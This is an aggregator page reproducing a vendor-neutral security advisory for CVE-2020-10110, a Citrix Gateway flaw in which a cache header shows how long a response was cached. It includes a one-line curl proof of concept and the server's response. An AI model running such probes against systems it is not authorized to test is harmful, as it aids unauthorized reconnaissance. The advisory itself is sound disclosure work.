Vulners
Lucene search
Citrix Gateway 11.1 / 12.0 / 12.1 Information Disclosure Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2020-10110 | 17 Oct 202402:24 | – | circl |
 | Citrix Gateway Information Disclosure Vulnerability | 9 Mar 202000:00 | – | cnvd |
 | CVE-2020-10110 | 6 Mar 202020:32 | – | cve |
 | CVE-2020-10110 | 6 Mar 202020:32 | – | cvelist |
 | CVE-2020-10110 | 6 Mar 202021:15 | – | nvd |
 | CVE-2020-10110 | 6 Mar 202021:15 | – | osv |
 | Citrix Gateway 11.1 / 12.0 / 12.1 Information Disclosure | 9 Mar 202000:00 | – | packetstorm |
 | Information disclosure | 6 Mar 202021:15 | – | prion |
 | PT-2020-11932 · Citrix · Citrix Adc +1 | 6 Mar 202000:00 | – | ptsecurity |
 | CVE-2020-10110 | 22 May 202515:07 | – | redhatcve |
10
Product: Citrix Gateway
Manufacturer: Citrix Systems, Inc.
Affected Version(s): 11.1, 12.0, 12.1
Tested Version(s): 11.1.63.15, 12.0.63.13, 12.1.55.18
Vulnerability Type: Information Exposure Through Caching (CWE-512)
Risk Level: Information Disclosure
Solution Status: Open
Manufacturer Notification: 2020-01-31
Solution Date: no solution
Public Disclosure: 2020-03-05
CVE Reference: CVE-2020-10110
Author of Advisory: Micha Borrmann (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
"Citrix Gateway is a customer-managed solution that can be deployed on
premises or on any public cloud, such as AWS, Azure, or Google Cloud
Platform. Citrix Gateway provides users with secure access and single
sign-on to all the virtual, SaaS and web applications they need to be
productive." (see [1])
The solution contains a caching system which shows how long an entry
was in the cache.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Some responses of the web based solution are handled with an included
caching system. This system can be seen in the HTTP response header.
The header also contains information, how long the response was in the
cache. The number of seconds will never exceed the value of 112.
After that period of time, the cache will be refreshed with an
additional client request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
$ curl --include --url https://$NSGATEWAYHOST/logon/themes/Default/resources/config.xml
HTTP/1.1 200 OK
Age: 21
Date: Fri, 31 Jan 2020 11:53:17 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, must-revalidate
Connection: Keep-Alive
Via: NS-CACHE-10.0: 121
ETag: "12a-59c921b8df640"
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 20 Jan 2020 13:17:05 GMT
Accept-Ranges: bytes
Content-Length: 298
X-Citrix-Application: Receiver for Web
Pragma: no-cache
Keep-Alive: timeout=15, max=95
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8" ?>
<ResourceManager>
<SupportedLanguageList>
<Language>en</Language>
<Language>de</Language>
<Language>es</Language>
<Language>fr</Language>
<Language>ja</Language>
<Language>zh-CN</Language>
</SupportedLanguageList>
</ResourceManager>
The "Via" header indicates that there is a caching system in place. The
"Age" header shows how many seconds the initial request was processed.
A value of 1 indicates that the response is sent from the web server
instead of from the cache.
# 0day.today [2020-03-11] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2020 00:00Current
5.4Medium risk
Vulners AI Score5.4
EPSS0.02596